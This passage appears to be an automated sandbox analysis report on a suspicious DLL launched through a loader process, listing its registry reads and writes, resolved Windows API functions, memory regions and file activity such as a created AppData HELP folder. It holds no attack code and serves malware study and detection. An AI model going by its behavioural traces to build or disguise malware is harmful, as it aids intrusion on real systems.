1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 100, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94365 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #12: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllCanUnloadNow /fn_args="0" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xae0 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00317fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00580fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0076ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0076ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94474 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #13: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllGetClassObject /fn_args="0" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xaec |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AF0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x00377fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0050ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00610fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x007dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x007bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x007dffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
